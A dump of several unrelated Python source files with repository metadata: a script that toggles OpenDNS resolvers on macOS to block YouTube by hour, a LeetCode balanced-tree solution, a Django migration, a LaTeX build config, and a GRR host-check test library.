getdns = subprocess.Popen(networksetup + " -getdnsservers " + netservice, shell=True, stdout=subprocess.PIPE)
result, err = getdns.communicate()
if action == "allow" and 'any DNS Servers set' not in result:
print "OpenDNS resolvers detected, deleting"
os.system(networksetup + " -setdnsservers " + netservice + " 'empty'")
flush_dnscache()
elif action == "deny" and 'any DNS Servers set' in result:
print "Adding OpenDNS resolvers"
update_opendns()
os.system(networksetup + " -setdnsservers " + netservice + " " + odns_resolvers)
flush_dnscache()
else:
print "Do nothing"
hour = get_hour()
if hour >= 18 and hour < 22:
print "Allowing YouTube", hour
update_resolvers('allow')
else:
print "Denying YouTube", hour
update_resolvers('deny') | vonfreud/tubenot | tubenot.py | Python | apache-2.0 | 2,107 |
# -*- encoding: utf-8 -*-
'''
Given a binary tree, determine if it is height-balanced.
For this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isBalanced(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
res = self.traverse(root)
return res[1]
def traverse(self, root):
if root == None:
return 0, True
lh, res = self.traverse(root.left)
if res == False:
return lh, False
rh, res = self.traverse(root.right)
if res == False:
return rh, False
if abs(lh - rh) > 1:
return max(lh, rh), False
return max(lh, rh) + 1, True
| weixsong/algorithm | leetcode/110.py | Python | mit | 1,004 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
dependencies = [
('delivery', '0040_auto_20151101_1833'),
]
operations = [
migrations.AlterModelOptions(
name='mailaccount',
options={'ordering': ['-created_at'], 'get_latest_by': 'pk', 'verbose_name': 'SMTP Account', 'verbose_name_plural': 'SMTP Accounts'},
),
#migrations.AddField(
# model_name='mailaccount',
# name='is_auto_active',
# field=models.BooleanField(default=True, verbose_name='\u0410\u043a\u043a\u0430\u0443\u043d\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0439'),
#),
migrations.AlterField(
model_name='delivery',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='delivery',
name='name',
field=models.CharField(default=b'2015-11-13T17:40:59.862534', max_length=128, null=True, verbose_name='\u0418\u043c\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438', blank=True),
),
migrations.AlterField(
model_name='delivery',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='emailfordelivery',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='emailfordelivery',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='emailmiddledelivery',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='emailmiddledelivery',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='mailaccount',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='mailaccount',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='mailserver',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='mailserver',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='spamemail',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
migrations.AlterField(
model_name='spamemail',
name='email',
field=models.EmailField(max_length=254, verbose_name='E-Mail'),
),
migrations.AlterField(
model_name='traceofvisits',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True),
),
]
| AlexStarov/Shop | applications/delivery/migrations/0041_auto_20151113_1741.py | Python | apache-2.0 | 4,641 |
#! /usr/bin/python
# -*- coding: utf8 -*-
from __future__ import unicode_literals
import LaTeXparser
import LaTeXparser.PytexTools
import commons
import plugins_agreg
myRequest = LaTeXparser.PytexTools.Request("mesure")
myRequest.ok_hash=commons.ok_hash
myRequest.add_plugin(plugins_agreg.set_isAgreg,"before_pytex")
myRequest.original_filename="mazhe.tex"
myRequest.ok_filenames_list=["e_mazhe"]
myRequest.ok_filenames_list.extend(["gardeFrido"])
myRequest.ok_filenames_list.extend(["43_mesure"])
myRequest.ok_filenames_list.extend(["56_espace_vecto_norme"])
myRequest.ok_filenames_list.extend(["<++>"])
myRequest.ok_filenames_list.extend(["<++>"])
myRequest.ok_filenames_list.extend(["<++>"])
myRequest.ok_filenames_list.extend(["<++>"])
myRequest.ok_filenames_list.extend(["134_choses_finales"])
myRequest.new_output_filename="0-exemple.pdf"
| LaurentClaessens/frtex | src/test/java/latex/mazhe_tex_test/lst_exemple.py | Python | gpl-3.0 | 853 |
#!/usr/bin/env python
"""A library for check-specific tests."""
import collections
import os
import StringIO
import yaml
from grr.lib import config_lib
from grr.lib import registry
from grr.lib import test_lib
from grr.lib import type_info
from grr.lib.checks import checks
from grr.lib.checks import filters
from grr.lib.checks import hints
from grr.lib.rdfvalues import anomaly as rdf_anomaly
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import paths as rdf_paths
from grr.parsers import linux_service_parser
class HostCheckTest(test_lib.GRRBaseTest):
"""The base class for host check tests."""
__metaclass__ = registry.MetaclassRegistry
loaded_checks = None
@classmethod
def LoadCheck(cls, cfg_file, *check_ids):
"""Loads checks from a file once per Test class.
LoadCheck will read a file containing a check configuration and instantiate
the checks from it. Specific checks can be selected by providing the check
ids that should be loaded from the file.
Checks are stored as a class attribute to prevent re-loading as each test
method is set up.
Args:
cfg_file: A path to the file that should be read.
*check_ids: A list of check ids that should be loaded from the file.
Returns:
The loaded check objects.
"""
if HostCheckTest.loaded_checks is None:
HostCheckTest.loaded_checks = {}
cfg = os.path.join(config_lib.CONFIG["Test.srcdir"], "grr", "checks",
cfg_file)
if check_ids:
key = "%s:%s" % (cfg, ",".join(check_ids))
if key in HostCheckTest.loaded_checks:
return HostCheckTest.loaded_checks[key]
loaded = []
for chk_id in check_ids:
loaded.append(checks.LoadCheckFromFile(cfg, chk_id))
HostCheckTest.loaded_checks[key] = loaded
return loaded
else:
key = "%s:*" % cfg_file
if key in HostCheckTest.loaded_checks:
return HostCheckTest.loaded_checks[key]
else:
result = checks.LoadChecksFromFiles([cfg])
HostCheckTest.loaded_checks[key] = result
return result
def TestDataPath(self, file_name):
"""Generates a full path to the test data."""
path = os.path.join(config_lib.CONFIG["Test.data_dir"], file_name)
if not os.path.isfile(path):
raise test_lib.Error("Missing test data: %s" % file_name)
return path
@classmethod
def SetKnowledgeBase(cls, hostname="test.example.com", host_os="Linux",
host_data=None):
"""Generates a KnowledgeBase entry in the host_data used by checks."""
if not host_data:
host_data = {}
kb = rdf_client.KnowledgeBase()
kb.hostname = hostname
kb.os = host_os
host_data["KnowledgeBase"] = kb
return host_data
def SetArtifactData(self, anomaly=None, parsed=None, raw=None, results=None):
"""Adds data in the format required by host_data."""
if not results:
results = {"ANOMALY": [], "PARSER": [], "RAW": []}
results["ANOMALY"].extend(anomaly or [])
results["PARSER"].extend(parsed or [])
results["RAW"].extend(raw or [])
return results
def AddData(self, parser, *args, **kwargs):
"""Initialize the parser and add parsed data to host_data."""
return [parser().Parse(*args, **kwargs)]
def AddListener(self, ip, port, family="INET", sock_type="SOCK_STREAM"):
"""Create a network connection."""
conn = rdf_client.NetworkConnection()
conn.state = "LISTEN"
conn.family = family
conn.type = sock_type
conn.local_address = rdf_client.NetworkEndpoint(ip=ip, port=port)
return conn
def RunChecks(self, host_data, labels=None, restrict_checks=None):
"""Runs the registered checks against the provided host data.
Args:
host_data: A dictionary of artifact_names and results. Results are, in
turn, a dictionary of {'ANOMALY': [], 'PARSED': [], 'RAW': []} items.
labels: Additional labels attached to the host.
restrict_checks: A list specifying a subset of check_ids to run.
Returns:
An iterator of check results.
"""
return {r.check_id: r for r in checks.CheckHost(
host_data, labels=labels, restrict_checks=restrict_checks)}
def GetCheckErrors(self, check_spec):
"""Collect errors generated by host checking tools."""
errors = []
try:
check = checks.Check(**check_spec)
check.Validate()
except (checks.Error, filters.Error, hints.Error, type_info.Error) as e:
errors.append(str(e))
except Exception as e:
# TODO(user): More granular exception handling.
errors.append("Unknown error %s: %s" % (type(e), e))
return errors
def CreateStat(self, path, uid=0, gid=0, mode=0o0100640):
"""Given path, uid, gid and file mode, this returns a StatEntry."""
pathspec = rdf_paths.PathSpec(path=path, pathtype="OS")
return rdf_client.StatEntry(pathspec=pathspec, st_uid=uid, st_gid=gid,
st_mode=mode)
def _AddToHostData(self, host_data, artifact, data, parser):
"""Parse raw data collected for an artifact into the host_data table."""
if type(data) != dict:
raise test_lib.Error("Data for %s is not of type dictionary." % artifact)
rdfs = []
stats = []
files = []
for path, lines in data.items():
stat = self.CreateStat(path)
stats.append(stat)
file_obj = StringIO.StringIO(lines)
files.append(file_obj)
if not parser.process_together:
rdfs.extend(list(parser.Parse(stat, file_obj, None)))
if parser.process_together:
rdfs = list(parser.ParseMultiple(stats, files, None))
host_data[artifact] = self.SetArtifactData(
anomaly=[a for a in rdfs if isinstance(a, rdf_anomaly.Anomaly)],
parsed=[r for r in rdfs if not isinstance(r, rdf_anomaly.Anomaly)],
raw=stats, results=host_data.get(artifact))
return host_data
def GenResults(self, artifact_list, sources_list, parser_list=None):
"""Given a list of artifacts, sources and parsers, will RunChecks on them.
Sample: (["Artifact1", "Artifact2"], [artifact1_data, artifact2_data],
[config_file.artifact1_Parser(), config_file.artifact2_Parser()]
artifact1_Parser().parse will run on artifact1_data & parsed results, along
with raw and anomalies will be inserted into the host_data["Artifact1"].
artifact2_Parser().parse will run on artifact2_data & parsed results, along
with raw and anomalies will be inserted into the host_data["Artifact2"].
Once artifacts added to host_data, loaded checks will be run against it.
Args:
artifact_list: list of artifacts to add to host_data for running checks
sources_list: list of dictionaries containing file names and file data.
If parser_list is empty then sources_list must contain a list of lists
containing StatEntry or lists of other raw artifact data.
parser_list: list of parsers to apply to file data from sources_list.
This can be empty if no parser is to be applied.
Returns:
CheckResult containing any findings in sources_list against loaded checks.
"""
if parser_list is None:
parser_list = [None] * len(artifact_list)
# make sure all vars are lists
if any(type(lst) != list for lst in [artifact_list, sources_list,
parser_list]):
raise test_lib.Error("All inputs are not lists.")
# make sure all lists are of equal length
if any(len(lst) != len(artifact_list) for lst in [sources_list,
parser_list]):
raise test_lib.Error("All lists are not of the same length.")
host_data = self.SetKnowledgeBase()
for artifact, sources, parser in zip(artifact_list, sources_list,
parser_list):
if parser is None:
host_data[artifact] = self.SetArtifactData(
raw=sources, results=host_data.get(artifact))
else:
host_data = self._AddToHostData(host_data, artifact, sources, parser)
return self.RunChecks(host_data)
def GenProcessData(self, processes):
"""Create some process-based host data."""
host_data = self.SetKnowledgeBase()
data = []
for (name, pid, cmdline) in processes:
data.append(rdf_client.Process(name=name, pid=pid, cmdline=cmdline))
host_data["ListProcessesGrr"] = self.SetArtifactData(parsed=data)
return host_data
@classmethod
def _GenFileData(cls, paths, data, stats=None, files=None, modes=None):
"""Generate a tuple of list of stats and list of file contents."""
if stats is None:
stats = []
if files is None:
files = []
if modes is None:
modes = {}
modes.setdefault("st_uid", 0)
modes.setdefault("st_gid", 0)
modes.setdefault("st_mode", 0o0100644)
for path in paths:
p = rdf_paths.PathSpec(path=path, pathtype="OS")
stats.append(rdf_client.StatEntry(pathspec=p, **modes))
for val in data:
files.append(StringIO.StringIO(val))
return stats, files
@classmethod
def GenStatFileData(cls, data, modes=None):
"""Gen a tuple of list of stats and list of file contents from a dict."""
paths = []
contents = []
for path, content in data.iteritems():
paths.append(path)
contents.append(content)
return cls._GenFileData(paths, contents, modes=modes)
def GenFileData(self, artifact, data, parser=None, modes=None, include=None):
"""Create a set of host_data results based on file parser results.
Creates a host data result populated with a knowledge base, then processes
each piece of host data as if it were file results using a parser. Specific
stat values can be provided to the parser, if required, so that permissions,
ownership and file types can be defined.
Args:
artifact: The artifact name that generated data will be mapped to.
data: A dictionary of pathnames and data strings. The data strings are
converted into file objects for the parser.
parser: The FileParser that processes the data (and stats)
modes: A dictionary of pathnames and stat values. Stat values are a dict
of {st_uid: int, st_gid: int, st_mode: oct} entries.
include: A list of pathnames to include in processing. If not provided,
all paths are parsed.
Returns:
the host_data map populated with a knowledge base and artifact data.
"""
host_data = self.SetKnowledgeBase()
if not parser:
raise test_lib.Error("Test method requires an initialized parser.")
if not modes:
modes = {}
kb = host_data["KnowledgeBase"]
files = []
rdfs = []
stats = []
for path in data:
if include and path not in include:
continue
file_modes = modes.get(path, {})
stats, files = self._GenFileData([path], [data[path]], stats=stats,
files=files, modes=file_modes)
if parser.process_together:
rdfs = list(parser.ParseMultiple(stats, files, kb))
else:
for stat, file_obj in zip(stats, files):
# Make sure the parser result is iterable.
rslt = parser.Parse(stat, file_obj, kb) or []
rdfs.extend(rslt)
anomaly = [a for a in rdfs if isinstance(a, rdf_anomaly.Anomaly)]
parsed = [r for r in rdfs if not isinstance(r, rdf_anomaly.Anomaly)]
host_data[artifact] = self.SetArtifactData(
parsed=parsed, anomaly=anomaly, raw=stats)
return host_data
def GenSysVInitData(self, links):
"""Create some Sys V init host data."""
return self.GenFileData(artifact="LinuxServices",
data={x: "" for x in links},
parser=linux_service_parser.LinuxSysVInitParser(),
modes={x: {"st_mode": 41471} for x in links})
# The assert methods
def assertRanChecks(self, check_ids, results):
"""Tests that the specified checks were run."""
self.assertTrue(set(check_ids).issubset(set(results.keys())))
def assertChecksNotRun(self, check_ids, results):
"""Tests that the specified checks were not run."""
self.assertFalse(set(check_ids).intersection(set(results.keys())))
def assertResultEqual(self, rslt1, rslt2):
"""Tests whether two check results are identical."""
# Build a map of anomaly symptoms to findings.
if rslt1.check_id != rslt2.check_id:
self.fail("Check IDs differ: %s vs %s" % (rslt1.check_id, rslt2.check_id))
# Quick check to see if anomaly counts are the same and they have the same
# ordering, using symptoms as a measure.
rslt1_anoms = {}
for a in rslt1.anomaly:
anoms = rslt1_anoms.setdefault(a.symptom, [])
anoms.extend(a.finding)
rslt2_anoms = {}
for a in rslt2.anomaly:
anoms = rslt2_anoms.setdefault(a.symptom, [])
anoms.extend(a.finding)
self.assertItemsEqual(rslt1_anoms, rslt2_anoms,
"Results have different anomaly items.:\n%s\n%s" %
(rslt1_anoms.keys(), rslt2_anoms.keys()))
# Now check that the anomalies are the same, modulo newlines.
for symptom, findings in rslt1_anoms.iteritems():
rslt1_found = [f.strip() for f in findings]
rslt2_found = [f.strip() for f in rslt2_anoms[symptom]]
self.assertItemsEqual(rslt1_found, rslt2_found)
def assertIsCheckIdResult(self, rslt, expected):
"""Tests if a check has the expected check_id."""
self.assertIsInstance(rslt, checks.CheckResult)
self.assertEqual(expected, rslt.check_id)
def assertValidCheck(self, check_spec):
"""Tests if a check definition generates structural errors."""
errors = self.GetCheckErrors(check_spec)
if errors:
self.fail("\n".join(errors))
def assertValidCheckFile(self, path):
"""Tests whether a check definition has a valid configuration."""
# Figure out the relative path of the check files.
prefix = os.path.commonprefix(config_lib.CONFIG["Checks.config_dir"])
relpath = os.path.relpath(path, prefix)
# If the config can't load fail immediately.
try:
configs = checks.LoadConfigsFromFile(path)
except yaml.error.YAMLError as e:
self.fail("File %s could not be parsed: %s\n" % (relpath, e))
# Otherwise, check all the configs and pass/fail at the end.
errors = collections.OrderedDict()
for check_id, check_spec in configs.iteritems():
check_errors = self.GetCheckErrors(check_spec)
if check_errors:
msg = errors.setdefault(relpath, ["check_id: %s" % check_id])
msg.append(check_errors)
if errors:
message = ""
for k, v in errors.iteritems():
message += "File %s errors:\n" % k
message += " %s\n" % v[0]
for err in v[1]:
message += " %s\n" % err
self.fail(message)
def _HasSymptom(self, anomalies, sym):
"""Tests if one or more anomalies contain the expected symptom string."""
if sym is None:
return True
rslts = {rslt.symptom: rslt for rslt in anomalies}
rslt = rslts.get(sym)
# Anomalies evaluate false if there are no finding strings.
self.assertTrue(rslt is not None,
"Didn't get expected symptom string '%s' in '%s'" %
(sym, ",".join(rslts)))
def _GetFindings(self, anomalies, sym):
"""Generate a set of findings from anomalies that match the symptom."""
result = set()
for anomaly in anomalies:
if anomaly.symptom == sym:
result.update(set(anomaly.finding))
return result
def _MatchFindings(self, expected, found):
"""Check that every expected finding is a substring of a found finding."""
matched_so_far = set()
for finding_str in expected:
no_match = True
for found_str in found:
if finding_str in found_str:
matched_so_far.add(found_str)
no_match = False
break
if no_match:
return False
# If we got here, all expected's match at least one item.
# Now check if every item in found was matched at least once.
# If so, everything is as expected, If not, Badness.
if not matched_so_far.symmetric_difference(found):
return True
def assertCheckDetectedAnom(self, check_id, results, sym=None, findings=None):
"""Assert a check was performed and specific anomalies were found.
Results may contain multiple anomalies. The check will hold true if any
one of them matches. As some results can contain multiple anomalies we
will need to make sure the right anomalies are selected.
If an symptom is provided, look for anomalies that matches the
expression string and use those. Otherwise, all anomalies in the
check should be used.
If finding strings are provided, the check tests if the substring is present
in the findings of the anomalies that are selected for testing. If the
finding results can have variable ordering, use a substring that will remain
constant for each finding.
Args:
check_id: The check_id as a string.
results: A dictionary of check results, mapped to check_ids
sym: An symptom string. This is the "title" of an advisory.
findings: A list of finding strings that should be present in the findings
of the selected anomaly.
Returns:
True if tests have succeeded and no further processing is required.
"""
chk = results.get(check_id)
self.assertTrue(chk is not None, "check %s did not run" % check_id)
# Checks return true if there were anomalies.
self.assertTrue(chk, "check %s did not generate anomalies" % check_id)
# If sym or results are passed as args, look for anomalies with these
# values.
self._HasSymptom(chk.anomaly, sym)
if findings is None:
# We are not expecting to match on findings, so skip checking them.
return True
findings = set(findings)
found = self._GetFindings(chk.anomaly, sym)
if self._MatchFindings(findings, found):
# Everything matches, and nothing unexpected, so all is good.
return True
# If we have made it here, we have the expected symptom but
# the findings didn't match up.
others = "\n".join([str(a) for a in chk.anomaly])
self.fail("Findings don't match for symptom '%s':\nExpected:\n %s\n"
"Got:\n %s\nFrom:\n%s"
% (sym, ", ".join(findings), ", ".join(found), others))
def assertCheckUndetected(self, check_id, results):
"""Assert a check_id was performed, and resulted in no anomalies."""
if not isinstance(results, collections.Mapping):
self.fail("Invalid arg, %s should be dict-like.\n" % type(results))
if check_id not in results:
self.fail("Check %s was not performed.\n" % check_id)
# A check result will evaluate as True if it contains an anomaly.
if results.get(check_id):
self.fail("Check %s unexpectedly produced an anomaly.\nGot: %s\n"
% (check_id, results.get(check_id).anomaly))
def assertChecksUndetected(self, check_ids, results):
"""Assert multiple check_ids were performed & they produced no anomalies."""
for check_id in check_ids:
self.assertCheckUndetected(check_id, results)
| darrenbilby/grr | lib/checks/checks_test_lib.py | Python | apache-2.0 | 19,268 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.